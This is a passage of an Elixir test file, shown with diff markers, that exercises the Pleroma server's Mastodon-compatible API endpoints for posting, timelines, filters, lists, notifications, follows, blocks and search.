	conn_three =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses", %{
	"status" => "cofe",
	"spoiler_text" => "2hu",
	"sensitive" => "false"
	})

	assert %{"id" => third_id} = json_response(conn_three, 200)

	refute id == third_id
	end

	test "posting a sensitive status", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses", %{"status" => "cofe", "sensitive" => true})

	assert %{"content" => "cofe", "id" => id, "sensitive" => true} = json_response(conn, 200)
	assert Repo.get(Activity, id)
	end

	test "posting a direct status", %{conn: conn} do
	user1 = insert(:user)
	user2 = insert(:user)
	content = "direct cofe @#{user2.nickname}"

	conn =
	conn
	\|> assign(:user, user1)
	\|> post("api/v1/statuses", %{"status" => content, "visibility" => "direct"})

	assert %{"id" => id, "visibility" => "direct"} = json_response(conn, 200)
	assert activity = Repo.get(Activity, id)
	assert activity.recipients == [user2.ap_id]
	assert activity.data["to"] == [user2.ap_id]
	assert activity.data["cc"] == []
	end

	test "direct timeline", %{conn: conn} do
	user_one = insert(:user)
	user_two = insert(:user)

	{:ok, user_two} = User.follow(user_two, user_one)

	{:ok, direct} =
	CommonAPI.post(user_one, %{
	"status" => "Hi @#{user_two.nickname}!",
	"visibility" => "direct"
	})

	{:ok, _follower_only} =
	CommonAPI.post(user_one, %{
	"status" => "Hi @#{user_two.nickname}!",
	"visibility" => "private"
	})

	# Only direct should be visible here
	res_conn =
	conn
	\|> assign(:user, user_two)
	\|> get("api/v1/timelines/direct")

	[status] = json_response(res_conn, 200)

	assert %{"visibility" => "direct"} = status
	assert status["url"] != direct.data["id"]

	# Both should be visible here
	res_conn =
	conn
	\|> assign(:user, user_two)
	\|> get("api/v1/timelines/home")

	[_s1, _s2] = json_response(res_conn, 200)

	# Test pagination
	Enum.each(1..20, fn _ ->
	{:ok, _} =
	CommonAPI.post(user_one, %{
	"status" => "Hi @#{user_two.nickname}!",
	"visibility" => "direct"
	})
	end)

	res_conn =
	conn
	\|> assign(:user, user_two)
	\|> get("api/v1/timelines/direct")

	statuses = json_response(res_conn, 200)
	assert length(statuses) == 20

	res_conn =
	conn
	\|> assign(:user, user_two)
	\|> get("api/v1/timelines/direct", %{max_id: List.last(statuses)["id"]})

	[status] = json_response(res_conn, 200)

	assert status["url"] != direct.data["id"]
	end

	test "replying to a status", %{conn: conn} do
	user = insert(:user)

	{:ok, replied_to} = TwitterAPI.create_status(user, %{"status" => "cofe"})

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses", %{"status" => "xD", "in_reply_to_id" => replied_to.id})

	assert %{"content" => "xD", "id" => id} = json_response(conn, 200)

	activity = Repo.get(Activity, id)

	assert activity.data["context"] == replied_to.data["context"]
	assert activity.data["object"]["inReplyToStatusId"] == replied_to.id
	end

	test "posting a status with an invalid in_reply_to_id", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses", %{"status" => "xD", "in_reply_to_id" => ""})

	assert %{"content" => "xD", "id" => id} = json_response(conn, 200)

	activity = Repo.get(Activity, id)

	assert activity
	end

	test "verify_credentials", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/verify_credentials")

	assert %{"id" => id, "source" => %{"privacy" => "public"}} = json_response(conn, 200)
	assert id == to_string(user.id)
	end

	test "verify_credentials default scope unlisted", %{conn: conn} do
	user = insert(:user, %{info: %Pleroma.User.Info{default_scope: "unlisted"}})

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/verify_credentials")

	assert %{"id" => id, "source" => %{"privacy" => "unlisted"}} = json_response(conn, 200)
	assert id == to_string(user.id)
	end

	test "get a status", %{conn: conn} do
	activity = insert(:note_activity)

	conn =
	conn
	\|> get("/api/v1/statuses/#{activity.id}")

	assert %{"id" => id} = json_response(conn, 200)
	assert id == to_string(activity.id)
	end

	describe "deleting a status" do
	test "when you created it", %{conn: conn} do
	activity = insert(:note_activity)
	author = User.get_by_ap_id(activity.data["actor"])

	conn =
	conn
	\|> assign(:user, author)
	\|> delete("/api/v1/statuses/#{activity.id}")

	assert %{} = json_response(conn, 200)

	refute Repo.get(Activity, activity.id)
	end

	test "when you didn't create it", %{conn: conn} do
	activity = insert(:note_activity)
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> delete("/api/v1/statuses/#{activity.id}")

	assert %{"error" => _} = json_response(conn, 403)

	assert Repo.get(Activity, activity.id) == activity
	end
	end

	describe "filters" do
	test "creating a filter", %{conn: conn} do
	user = insert(:user)

	filter = %Pleroma.Filter{
	phrase: "knights",
	context: ["home"]
	}

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/filters", %{"phrase" => filter.phrase, context: filter.context})

	assert response = json_response(conn, 200)
	assert response["phrase"] == filter.phrase
	assert response["context"] == filter.context
	assert response["id"] != nil
	assert response["id"] != ""
	end

	test "fetching a list of filters", %{conn: conn} do
	user = insert(:user)

	query_one = %Pleroma.Filter{
	user_id: user.id,
	filter_id: 1,
	phrase: "knights",
	context: ["home"]
	}

	query_two = %Pleroma.Filter{
	user_id: user.id,
	filter_id: 2,
	phrase: "who",
	context: ["home"]
	}

	{:ok, filter_one} = Pleroma.Filter.create(query_one)
	{:ok, filter_two} = Pleroma.Filter.create(query_two)

	response =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/filters")
	\|> json_response(200)

	assert response ==
	render_json(
	FilterView,
	"filters.json",
	filters: [filter_two, filter_one]
	)
	end

	test "get a filter", %{conn: conn} do
	user = insert(:user)

	query = %Pleroma.Filter{
	user_id: user.id,
	filter_id: 2,
	phrase: "knight",
	context: ["home"]
	}

	{:ok, filter} = Pleroma.Filter.create(query)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/filters/#{filter.filter_id}")

	- assert response = json_response(conn, 200)
	+ assert _response = json_response(conn, 200)
	end

	test "update a filter", %{conn: conn} do
	user = insert(:user)

	query = %Pleroma.Filter{
	user_id: user.id,
	filter_id: 2,
	phrase: "knight",
	context: ["home"]
	}

	{:ok, _filter} = Pleroma.Filter.create(query)

	new = %Pleroma.Filter{
	phrase: "nii",
	context: ["home"]
	}

	conn =
	conn
	\|> assign(:user, user)
	\|> put("/api/v1/filters/#{query.filter_id}", %{
	phrase: new.phrase,
	context: new.context
	})

	assert response = json_response(conn, 200)
	assert response["phrase"] == new.phrase
	assert response["context"] == new.context
	end

	test "delete a filter", %{conn: conn} do
	user = insert(:user)

	query = %Pleroma.Filter{
	user_id: user.id,
	filter_id: 2,
	phrase: "knight",
	context: ["home"]
	}

	{:ok, filter} = Pleroma.Filter.create(query)

	conn =
	conn
	\|> assign(:user, user)
	\|> delete("/api/v1/filters/#{filter.filter_id}")

	assert response = json_response(conn, 200)
	assert response == %{}
	end
	end

	describe "lists" do
	test "creating a list", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/lists", %{"title" => "cuties"})

	assert %{"title" => title} = json_response(conn, 200)
	assert title == "cuties"
	end

	test "adding users to a list", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)
	{:ok, list} = Pleroma.List.create("name", user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/lists/#{list.id}/accounts", %{"account_ids" => [other_user.id]})

	assert %{} == json_response(conn, 200)
	%Pleroma.List{following: following} = Pleroma.List.get(list.id, user)
	assert following == [other_user.follower_address]
	end

	test "removing users from a list", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)
	third_user = insert(:user)
	{:ok, list} = Pleroma.List.create("name", user)
	{:ok, list} = Pleroma.List.follow(list, other_user)
	{:ok, list} = Pleroma.List.follow(list, third_user)

	conn =
	conn
	\|> assign(:user, user)
	\|> delete("/api/v1/lists/#{list.id}/accounts", %{"account_ids" => [other_user.id]})

	assert %{} == json_response(conn, 200)
	%Pleroma.List{following: following} = Pleroma.List.get(list.id, user)
	assert following == [third_user.follower_address]
	end

	test "listing users in a list", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)
	{:ok, list} = Pleroma.List.create("name", user)
	{:ok, list} = Pleroma.List.follow(list, other_user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/lists/#{list.id}/accounts", %{"account_ids" => [other_user.id]})

	assert [%{"id" => id}] = json_response(conn, 200)
	assert id == to_string(other_user.id)
	end

	test "retrieving a list", %{conn: conn} do
	user = insert(:user)
	{:ok, list} = Pleroma.List.create("name", user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/lists/#{list.id}")

	assert %{"id" => id} = json_response(conn, 200)
	assert id == to_string(list.id)
	end

	test "renaming a list", %{conn: conn} do
	user = insert(:user)
	{:ok, list} = Pleroma.List.create("name", user)

	conn =
	conn
	\|> assign(:user, user)
	\|> put("/api/v1/lists/#{list.id}", %{"title" => "newname"})

	assert %{"title" => name} = json_response(conn, 200)
	assert name == "newname"
	end

	test "deleting a list", %{conn: conn} do
	user = insert(:user)
	{:ok, list} = Pleroma.List.create("name", user)

	conn =
	conn
	\|> assign(:user, user)
	\|> delete("/api/v1/lists/#{list.id}")

	assert %{} = json_response(conn, 200)
	assert is_nil(Repo.get(Pleroma.List, list.id))
	end

	test "list timeline", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)
	{:ok, _activity_one} = TwitterAPI.create_status(user, %{"status" => "Marisa is cute."})
	{:ok, activity_two} = TwitterAPI.create_status(other_user, %{"status" => "Marisa is cute."})
	{:ok, list} = Pleroma.List.create("name", user)
	{:ok, list} = Pleroma.List.follow(list, other_user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/timelines/list/#{list.id}")

	assert [%{"id" => id}] = json_response(conn, 200)

	assert id == to_string(activity_two.id)
	end

	test "list timeline does not leak non-public statuses for unfollowed users", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)
	{:ok, activity_one} = TwitterAPI.create_status(other_user, %{"status" => "Marisa is cute."})

	{:ok, _activity_two} =
	TwitterAPI.create_status(other_user, %{
	"status" => "Marisa is cute.",
	"visibility" => "private"
	})

	{:ok, list} = Pleroma.List.create("name", user)
	{:ok, list} = Pleroma.List.follow(list, other_user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/timelines/list/#{list.id}")

	assert [%{"id" => id}] = json_response(conn, 200)

	assert id == to_string(activity_one.id)
	end
	end

	describe "notifications" do
	test "list of notifications", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, activity} =
	TwitterAPI.create_status(other_user, %{"status" => "hi @#{user.nickname}"})

	{:ok, [_notification]} = Notification.create_notifications(activity)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/notifications")

	expected_response =
	- "hi <span><a data-user=\"#{user.id}\" href=\"#{user.ap_id}\">@<span>#{user.nickname}</span></a></span>"
	+ "hi <span class=\"h-card\"><a data-user=\"#{user.id}\" class=\"u-url mention\" href=\"#{
	+ user.ap_id
	+ }\">@<span>#{user.nickname}</span></a></span>"

	assert [%{"status" => %{"content" => response}} \| _rest] = json_response(conn, 200)
	assert response == expected_response
	end

	test "getting a single notification", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, activity} =
	TwitterAPI.create_status(other_user, %{"status" => "hi @#{user.nickname}"})

	{:ok, [notification]} = Notification.create_notifications(activity)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/notifications/#{notification.id}")

	expected_response =
	- "hi <span><a data-user=\"#{user.id}\" href=\"#{user.ap_id}\">@<span>#{user.nickname}</span></a></span>"
	+ "hi <span class=\"h-card\"><a data-user=\"#{user.id}\" class=\"u-url mention\" href=\"#{
	+ user.ap_id
	+ }\">@<span>#{user.nickname}</span></a></span>"

	assert %{"status" => %{"content" => response}} = json_response(conn, 200)
	assert response == expected_response
	end

	test "dismissing a single notification", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, activity} =
	TwitterAPI.create_status(other_user, %{"status" => "hi @#{user.nickname}"})

	{:ok, [notification]} = Notification.create_notifications(activity)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/notifications/dismiss", %{"id" => notification.id})

	assert %{} = json_response(conn, 200)
	end

	test "clearing all notifications", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, activity} =
	TwitterAPI.create_status(other_user, %{"status" => "hi @#{user.nickname}"})

	{:ok, [_notification]} = Notification.create_notifications(activity)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/notifications/clear")

	assert %{} = json_response(conn, 200)

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> get("/api/v1/notifications")

	assert all = json_response(conn, 200)
	assert all == []
	end
	end

	describe "reblogging" do
	test "reblogs and returns the reblogged status", %{conn: conn} do
	activity = insert(:note_activity)
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/#{activity.id}/reblog")

	assert %{"reblog" => %{"id" => id, "reblogged" => true, "reblogs_count" => 1}} =
	json_response(conn, 200)

	assert to_string(activity.id) == id
	end
	end

	describe "unreblogging" do
	test "unreblogs and returns the unreblogged status", %{conn: conn} do
	activity = insert(:note_activity)
	user = insert(:user)

	{:ok, _, _} = CommonAPI.repeat(activity.id, user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/#{activity.id}/unreblog")

	assert %{"id" => id, "reblogged" => false, "reblogs_count" => 0} = json_response(conn, 200)

	assert to_string(activity.id) == id
	end
	end

	describe "favoriting" do
	test "favs a status and returns it", %{conn: conn} do
	activity = insert(:note_activity)
	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/#{activity.id}/favourite")

	assert %{"id" => id, "favourites_count" => 1, "favourited" => true} =
	json_response(conn, 200)

	assert to_string(activity.id) == id
	end

	test "returns 500 for a wrong id", %{conn: conn} do
	user = insert(:user)

	resp =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/1/favourite")
	\|> json_response(500)

	assert resp == "Something went wrong"
	end
	end

	describe "unfavoriting" do
	test "unfavorites a status and returns it", %{conn: conn} do
	activity = insert(:note_activity)
	user = insert(:user)

	{:ok, _, _} = CommonAPI.favorite(activity.id, user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/statuses/#{activity.id}/unfavourite")

	assert %{"id" => id, "favourites_count" => 0, "favourited" => false} =
	json_response(conn, 200)

	assert to_string(activity.id) == id
	end
	end

	describe "user timelines" do
	test "gets a users statuses", %{conn: conn} do
	user_one = insert(:user)
	user_two = insert(:user)
	user_three = insert(:user)

	{:ok, user_three} = User.follow(user_three, user_one)

	{:ok, activity} = CommonAPI.post(user_one, %{"status" => "HI!!!"})

	{:ok, direct_activity} =
	CommonAPI.post(user_one, %{
	"status" => "Hi, @#{user_two.nickname}.",
	"visibility" => "direct"
	})

	{:ok, private_activity} =
	CommonAPI.post(user_one, %{"status" => "private", "visibility" => "private"})

	resp =
	conn
	\|> get("/api/v1/accounts/#{user_one.id}/statuses")

	assert [%{"id" => id}] = json_response(resp, 200)
	assert id == to_string(activity.id)

	resp =
	conn
	\|> assign(:user, user_two)
	\|> get("/api/v1/accounts/#{user_one.id}/statuses")

	assert [%{"id" => id_one}, %{"id" => id_two}] = json_response(resp, 200)
	assert id_one == to_string(direct_activity.id)
	assert id_two == to_string(activity.id)

	resp =
	conn
	\|> assign(:user, user_three)
	\|> get("/api/v1/accounts/#{user_one.id}/statuses")

	assert [%{"id" => id_one}, %{"id" => id_two}] = json_response(resp, 200)
	assert id_one == to_string(private_activity.id)
	assert id_two == to_string(activity.id)
	end

	test "unimplemented pinned statuses feature", %{conn: conn} do
	note = insert(:note_activity)
	user = User.get_by_ap_id(note.data["actor"])

	conn =
	conn
	\|> get("/api/v1/accounts/#{user.id}/statuses?pinned=true")

	assert json_response(conn, 200) == []
	end

	test "gets an users media", %{conn: conn} do
	note = insert(:note_activity)
	user = User.get_by_ap_id(note.data["actor"])

	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image.jpg"),
	filename: "an_image.jpg"
	}

	media =
	TwitterAPI.upload(file, user, "json")
	\|> Poison.decode!()

	{:ok, image_post} =
	TwitterAPI.create_status(user, %{"status" => "cofe", "media_ids" => [media["media_id"]]})

	conn =
	conn
	\|> get("/api/v1/accounts/#{user.id}/statuses", %{"only_media" => "true"})

	assert [%{"id" => id}] = json_response(conn, 200)
	assert id == to_string(image_post.id)

	conn =
	build_conn()
	\|> get("/api/v1/accounts/#{user.id}/statuses", %{"only_media" => "1"})

	assert [%{"id" => id}] = json_response(conn, 200)
	assert id == to_string(image_post.id)
	end

	test "gets a user's statuses without reblogs", %{conn: conn} do
	user = insert(:user)
	{:ok, post} = CommonAPI.post(user, %{"status" => "HI!!!"})
	{:ok, _, _} = CommonAPI.repeat(post.id, user)

	conn =
	conn
	\|> get("/api/v1/accounts/#{user.id}/statuses", %{"exclude_reblogs" => "true"})

	assert [%{"id" => id}] = json_response(conn, 200)
	assert id == to_string(post.id)

	conn =
	conn
	\|> get("/api/v1/accounts/#{user.id}/statuses", %{"exclude_reblogs" => "1"})

	assert [%{"id" => id}] = json_response(conn, 200)
	assert id == to_string(post.id)
	end
	end

	describe "user relationships" do
	test "returns the relationships for the current user", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)
	{:ok, user} = User.follow(user, other_user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/relationships", %{"id" => [other_user.id]})

	assert [relationship] = json_response(conn, 200)

	assert to_string(other_user.id) == relationship["id"]
	end
	end

	describe "locked accounts" do
	test "/api/v1/follow_requests works" do
	user = insert(:user, %{info: %Pleroma.User.Info{locked: true}})
	other_user = insert(:user)

	{:ok, _activity} = ActivityPub.follow(other_user, user)

	user = Repo.get(User, user.id)
	other_user = Repo.get(User, other_user.id)

	assert User.following?(other_user, user) == false

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> get("/api/v1/follow_requests")

	assert [relationship] = json_response(conn, 200)
	assert to_string(other_user.id) == relationship["id"]
	end

	test "/api/v1/follow_requests/:id/authorize works" do
	user = insert(:user, %{info: %Pleroma.User.Info{locked: true}})
	other_user = insert(:user)

	{:ok, _activity} = ActivityPub.follow(other_user, user)

	user = Repo.get(User, user.id)
	other_user = Repo.get(User, other_user.id)

	assert User.following?(other_user, user) == false

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> post("/api/v1/follow_requests/#{other_user.id}/authorize")

	assert relationship = json_response(conn, 200)
	assert to_string(other_user.id) == relationship["id"]

	user = Repo.get(User, user.id)
	other_user = Repo.get(User, other_user.id)

	assert User.following?(other_user, user) == true
	end

	test "verify_credentials", %{conn: conn} do
	user = insert(:user, %{info: %Pleroma.User.Info{default_scope: "private"}})

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/verify_credentials")

	assert %{"id" => id, "source" => %{"privacy" => "private"}} = json_response(conn, 200)
	assert id == to_string(user.id)
	end

	test "/api/v1/follow_requests/:id/reject works" do
	user = insert(:user, %{info: %Pleroma.User.Info{locked: true}})
	other_user = insert(:user)

	{:ok, _activity} = ActivityPub.follow(other_user, user)

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> post("/api/v1/follow_requests/#{other_user.id}/reject")

	assert relationship = json_response(conn, 200)
	assert to_string(other_user.id) == relationship["id"]

	user = Repo.get(User, user.id)
	other_user = Repo.get(User, other_user.id)

	assert User.following?(other_user, user) == false
	end
	end

	test "account fetching", %{conn: conn} do
	user = insert(:user)

	conn =
	conn
	\|> get("/api/v1/accounts/#{user.id}")

	assert %{"id" => id} = json_response(conn, 200)
	assert id == to_string(user.id)

	conn =
	build_conn()
	\|> get("/api/v1/accounts/-1")

	assert %{"error" => "Can't find user"} = json_response(conn, 404)
	end

	test "media upload", %{conn: conn} do
	file = %Plug.Upload{
	content_type: "image/jpg",
	path: Path.absname("test/fixtures/image.jpg"),
	filename: "an_image.jpg"
	}

	desc = "Description of the image"

	user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/media", %{"file" => file, "description" => desc})

	assert media = json_response(conn, 200)

	assert media["type"] == "image"
	assert media["description"] == desc
	assert media["id"]

	object = Repo.get(Object, media["id"])
	assert object.data["actor"] == User.ap_id(user)
	end

	test "hashtag timeline", %{conn: conn} do
	following = insert(:user)

	capture_log(fn ->
	{:ok, activity} = TwitterAPI.create_status(following, %{"status" => "test #2hu"})

	{:ok, [_activity]} =
	OStatus.fetch_activity_from_url("https://shitposter.club/notice/2827873")

	nconn =
	conn
	\|> get("/api/v1/timelines/tag/2hu")

	assert [%{"id" => id}] = json_response(nconn, 200)

	assert id == to_string(activity.id)

	# works for different capitalization too
	nconn =
	conn
	\|> get("/api/v1/timelines/tag/2HU")

	assert [%{"id" => id}] = json_response(nconn, 200)

	assert id == to_string(activity.id)
	end)
	end

	test "getting followers", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)
	{:ok, user} = User.follow(user, other_user)

	conn =
	conn
	\|> get("/api/v1/accounts/#{other_user.id}/followers")

	assert [%{"id" => id}] = json_response(conn, 200)
	assert id == to_string(user.id)
	end

	test "getting followers, hide_network", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user, %{info: %{hide_network: true}})
	{:ok, _user} = User.follow(user, other_user)

	conn =
	conn
	\|> get("/api/v1/accounts/#{other_user.id}/followers")

	assert [] == json_response(conn, 200)
	end

	test "getting followers, hide_network, same user requesting", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user, %{info: %{hide_network: true}})
	{:ok, _user} = User.follow(user, other_user)

	conn =
	conn
	\|> assign(:user, other_user)
	\|> get("/api/v1/accounts/#{other_user.id}/followers")

	refute [] == json_response(conn, 200)
	end

	test "getting following", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)
	{:ok, user} = User.follow(user, other_user)

	conn =
	conn
	\|> get("/api/v1/accounts/#{user.id}/following")

	assert [%{"id" => id}] = json_response(conn, 200)
	assert id == to_string(other_user.id)
	end

	test "getting following, hide_network", %{conn: conn} do
	user = insert(:user, %{info: %{hide_network: true}})
	other_user = insert(:user)
	{:ok, user} = User.follow(user, other_user)

	conn =
	conn
	\|> get("/api/v1/accounts/#{user.id}/following")

	assert [] == json_response(conn, 200)
	end

	test "getting following, hide_network, same user requesting", %{conn: conn} do
	user = insert(:user, %{info: %{hide_network: true}})
	other_user = insert(:user)
	{:ok, user} = User.follow(user, other_user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/#{user.id}/following")

	refute [] == json_response(conn, 200)
	end

	test "following / unfollowing a user", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/accounts/#{other_user.id}/follow")

	assert %{"id" => _id, "following" => true} = json_response(conn, 200)

	user = Repo.get(User, user.id)

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> post("/api/v1/accounts/#{other_user.id}/unfollow")

	assert %{"id" => _id, "following" => false} = json_response(conn, 200)

	user = Repo.get(User, user.id)

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> post("/api/v1/follows", %{"uri" => other_user.nickname})

	assert %{"id" => id} = json_response(conn, 200)
	assert id == to_string(other_user.id)
	end

	test "blocking / unblocking a user", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/accounts/#{other_user.id}/block")

	assert %{"id" => _id, "blocking" => true} = json_response(conn, 200)

	user = Repo.get(User, user.id)

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> post("/api/v1/accounts/#{other_user.id}/unblock")

	assert %{"id" => _id, "blocking" => false} = json_response(conn, 200)
	end

	test "getting a list of blocks", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, user} = User.block(user, other_user)

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/blocks")

	other_user_id = to_string(other_user.id)
	assert [%{"id" => ^other_user_id}] = json_response(conn, 200)
	end

	test "blocking / unblocking a domain", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user, %{ap_id: "https://dogwhistle.zone/@pundit"})

	conn =
	conn
	\|> assign(:user, user)
	\|> post("/api/v1/domain_blocks", %{"domain" => "dogwhistle.zone"})

	assert %{} = json_response(conn, 200)
	user = User.get_cached_by_ap_id(user.ap_id)
	assert User.blocks?(user, other_user)

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> delete("/api/v1/domain_blocks", %{"domain" => "dogwhistle.zone"})

	assert %{} = json_response(conn, 200)
	user = User.get_cached_by_ap_id(user.ap_id)
	refute User.blocks?(user, other_user)
	end

	test "getting a list of domain blocks", %{conn: conn} do
	user = insert(:user)

	{:ok, user} = User.block_domain(user, "bad.site")
	{:ok, user} = User.block_domain(user, "even.worse.site")

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/domain_blocks")

	domain_blocks = json_response(conn, 200)

	assert "bad.site" in domain_blocks
	assert "even.worse.site" in domain_blocks
	end

	test "unimplemented mute endpoints" do
	user = insert(:user)
	other_user = insert(:user)

	["mute", "unmute"]
	\|> Enum.each(fn endpoint ->
	conn =
	build_conn()
	\|> assign(:user, user)
	\|> post("/api/v1/accounts/#{other_user.id}/#{endpoint}")

	assert %{"id" => id} = json_response(conn, 200)
	assert id == to_string(other_user.id)
	end)
	end

	test "unimplemented mutes, follow_requests, blocks, domain blocks" do
	user = insert(:user)

	["blocks", "domain_blocks", "mutes", "follow_requests"]
	\|> Enum.each(fn endpoint ->
	conn =
	build_conn()
	\|> assign(:user, user)
	\|> get("/api/v1/#{endpoint}")

	assert [] = json_response(conn, 200)
	end)
	end

	test "account search", %{conn: conn} do
	user = insert(:user)
	user_two = insert(:user, %{nickname: "shp@shitposter.club"})
	user_three = insert(:user, %{nickname: "shp@heldscal.la", name: "I love 2hu"})

	results =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/search", %{"q" => "shp"})
	\|> json_response(200)

	result_ids = for result <- results, do: result["acct"]

	assert user_two.nickname in result_ids
	assert user_three.nickname in result_ids

	results =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/accounts/search", %{"q" => "2hu"})
	\|> json_response(200)

	result_ids = for result <- results, do: result["acct"]

	assert user_three.nickname in result_ids
	end

	test "search", %{conn: conn} do
	user = insert(:user)
	user_two = insert(:user, %{nickname: "shp@shitposter.club"})
	user_three = insert(:user, %{nickname: "shp@heldscal.la", name: "I love 2hu"})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "This is about 2hu"})

	{:ok, _activity} =
	CommonAPI.post(user, %{
	"status" => "This is about 2hu, but private",
	"visibility" => "private"
	})

	{:ok, _} = CommonAPI.post(user_two, %{"status" => "This isn't"})

	conn =
	conn
	\|> get("/api/v1/search", %{"q" => "2hu"})

	assert results = json_response(conn, 200)

	[account \| _] = results["accounts"]
	assert account["id"] == to_string(user_three.id)

	assert results["hashtags"] == []

	[status] = results["statuses"]
	assert status["id"] == to_string(activity.id)
	end

	test "search fetches remote statuses", %{conn: conn} do
	capture_log(fn ->
	conn =
	conn
	\|> get("/api/v1/search", %{"q" => "https://shitposter.club/notice/2827873"})

	assert results = json_response(conn, 200)

	[status] = results["statuses"]
	assert status["uri"] == "tag:shitposter.club,2017-05-05:noticeId=2827873:objectType=comment"
	end)
	end

	test "search doesn't show statuses that it shouldn't", %{conn: conn} do
	{:ok, activity} =
	CommonAPI.post(insert(:user), %{
	"status" => "This is about 2hu, but private",
	"visibility" => "private"
	})

	capture_log(fn ->
	conn =
	conn
	\|> get("/api/v1/search", %{"q" => activity.data["object"]["id"]})

	assert results = json_response(conn, 200)

	[] = results["statuses"]
	end)
	end

	test "search fetches remote accounts", %{conn: conn} do
	conn =
	conn
	\|> get("/api/v1/search", %{"q" => "shp@social.heldscal.la", "resolve" => "true"})

	assert results = json_response(conn, 200)
	[account] = results["accounts"]
	assert account["acct"] == "shp@social.heldscal.la"
	end

	test "returns the favorites of a user", %{conn: conn} do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, _} = CommonAPI.post(other_user, %{"status" => "bla"})
	{:ok, activity} = CommonAPI.post(other_user, %{"status" => "traps are happy"})

	{:ok, _, _} = CommonAPI.favorite(activity.id, user)

	- conn =
	+ first_conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/favourites")

	- assert [status] = json_response(conn, 200)
	+ assert [status] = json_response(first_conn, 200)
	assert status["id"] == to_string(activity.id)
	+
	+ assert [{"link", _link_header}] =
	+ Enum.filter(first_conn.resp_headers, fn element -> match?({"link", _}, element) end)
	+
	+ # Honours query params
	+ {:ok, second_activity} =
	+ CommonAPI.post(other_user, %{
	+ "status" =>
	+ "Trees Are Never Sad Look At Them Every Once In Awhile They're Quite Beautiful."
	+ })
	+
	+ {:ok, _, _} = CommonAPI.favorite(second_activity.id, user)
	+
	+ last_like = status["id"]
	+
	+ second_conn =
	+ conn
	+ \|> assign(:user, user)
	+ \|> get("/api/v1/favourites?since_id=#{last_like}")
	+
	+ assert [second_status] = json_response(second_conn, 200)
	+ assert second_status["id"] == to_string(second_activity.id)
	+
	+ third_conn =
	+ conn
	+ \|> assign(:user, user)
	+ \|> get("/api/v1/favourites?limit=0")
	+
	+ assert [] = json_response(third_conn, 200)
	end

	describe "updating credentials" do
	test "updates the user's bio", %{conn: conn} do
	user = insert(:user)
	user2 = insert(:user)

	conn =
	conn
	\|> assign(:user, user)
	\|> patch("/api/v1/accounts/update_credentials", %{
	"note" => "I drink #cofe with @#{user2.nickname}"
	})

